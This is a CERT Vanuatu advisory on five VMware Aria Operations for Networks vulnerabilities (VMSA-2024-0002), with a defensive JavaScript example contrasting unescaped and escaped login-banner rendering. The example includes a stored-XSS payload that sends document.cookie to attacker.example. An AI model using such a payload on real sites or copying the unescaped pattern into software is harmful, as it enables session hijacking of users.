Advisory 51 : VMware Releases Security Advisory for Aria Operations for Networks
Release Date : 6th of February 2024
Impact : HIGH (VMware rates VMSA-2024-0002 as Important; CVSSv3 base scores range from 4.3 to 7.8)
TLP Rating: Clear
CERT Vanuatu (CERTVU) and the Office of the Government Chief Information Officer (OGCIO) provide the following advisory.
What is it?
VMware released security advisory VMSA-2024-0002 to address five vulnerabilities in VMware Aria Operations for Networks (formerly vRealize Network Insight).
- Local Privilege Escalation Vulnerability (CVE-2024-22237) Aria Operations for Networks contains a local privilege escalation vulnerability.
- Cross-Site Scripting Vulnerability (CVE-2024-22238) Aria Operations for Networks contains a cross-site scripting vulnerability.
- Local Privilege Escalation Vulnerability (CVE-2024-22239) Aria Operations for Networks contains a local privilege escalation vulnerability.
- Local File Read Vulnerability (CVE-2024-22240) Aria Operations for Networks contains a local file read vulnerability.
- Cross-Site Scripting Vulnerability (CVE-2024-22241) Aria Operations for Networks contains a cross-site scripting vulnerability.
What are the Systems affected?
These issues affect:
VMware Aria Operations for Networks 6.x, including version 6.12, on any appliance that has not yet had the KB96450 patch applied.
What does this mean?
None of the five issues is exploitable by an unauthenticated remote attacker: the two privilege escalation flaws require console access to the appliance, and the cross-site scripting and local file read flaws require administrator privileges in the product. An attacker who already holds such access could use them to gain root on the appliance, read sensitive files, or take over other users' accounts, and so take control of the affected system.
- Local Privilege Escalation Vulnerability (CVE-2024-22237) A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system.
- Cross-Site Scripting Vulnerability (CVE-2024-22238) A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization.
- Local Privilege Escalation Vulnerability (CVE-2024-22239) A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access.
- Local File Read Vulnerability (CVE-2024-22240) A malicious actor with admin privilege may exploit this vulnerability leading to unauthorized access to sensitive information.
- Cross-Site Scripting Vulnerability (CVE-2024-22241) A malicious actor with admin privileges can inject a malicious payload into the login banner and take over the accounts of users who view it.
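The two cross-site scripting items above (CVE-2024-22238 and CVE-2024-22241) both come down to admin-supplied text (a user profile field, the login banner) being placed into a page without output encoding. The following is an added, generic illustration of that flaw class and its fix, written for this advisory; it is not VMware's code and makes no claim about how Aria Operations for Networks renders its banner. The function names, the banner payload and the wrapper markup are all constructed for the example.

```javascript
// Added illustration of stored XSS in a login banner and its fix.
// NOT VMware's code; names, markup and payload are hypothetical.

// Entity-encode text that will be placed inside an HTML element body.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: admin-controlled banner text is interpolated raw into the page,
// so any markup or script it contains runs in every user's browser.
function renderLoginBannerUnsafe(bannerText) {
  return `<div class="login-banner">${bannerText}</div>`;
}

// Hardened: encode before interpolation; markup in the banner is shown as text.
function renderLoginBannerSafe(bannerText) {
  return `<div class="login-banner">${escapeHtml(bannerText)}</div>`;
}

// Rough check used by the demo: after removing the wrapper we emitted,
// does anything that came from the banner still open an HTML tag?
// (A real browser would parse and execute such a tag; here we just detect it.)
function containsInjectedMarkup(html) {
  const inner = html
    .replace(/^<div class="login-banner">/, "")
    .replace(/<\/div>$/, "");
  return /<[a-zA-Z!/]/.test(inner);
}

// Constructed payload: a typical stored-XSS probe that would leak the
// viewer's session cookie to an attacker-controlled host (example domain).
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Render the same banner both ways and report whether live markup survived.
function demo(bannerText = PAYLOAD) {
  const unsafe = renderLoginBannerUnsafe(bannerText);
  const safe = renderLoginBannerSafe(bannerText);
  return {
    unsafe,
    safe,
    unsafeInjected: containsInjectedMarkup(unsafe),
    safeInjected: containsInjectedMarkup(safe),
  };
}

const result = demo();
console.log("unsafe render executes injected tag:", result.unsafeInjected);
console.log("safe render executes injected tag:  ", result.safeInjected);
```

The encoder above is only correct for text in an element body; a value placed into an attribute, a URL or inline JavaScript needs context-specific encoding, which is why a templating engine with automatic contextual escaping (plus HttpOnly session cookies and a Content-Security-Policy) is the practical defence rather than hand-written string replacement.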
Mitigation process
Administrators should review their environment for deployments of VMware Aria Operations for Networks 6.x and apply the fix described in VMware KB96450, the patch referenced by VMSA-2024-0002, as soon as possible. Until the patch is applied, limit console access to the appliance and administrator accounts in the product to trusted personnel, since all five issues require one or the other.
Download the fixed version: KB96450 (patch for all 6.x releases).
References
- https://www.cisa.gov/news-events/alerts/2024/02/07/vmware-releases-security-advisory-aria-operations-networks
- https://www.vmware.com/security/advisories/VMSA-2024-0002.html
- https://kb.vmware.com/s/article/96450
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22237
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22238
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22239
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22240
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22241
- Download advisory (English): VMware Releases Security Advisory for Aria Operations for Networks
- Download advisory (Bislama): VMware Releases Security Advisory for Aria Operations for Networks (Bislama-language version)
- Download advisory (French): VMware Publishes a Security Bulletin for Aria Operations for Networks (French-language version)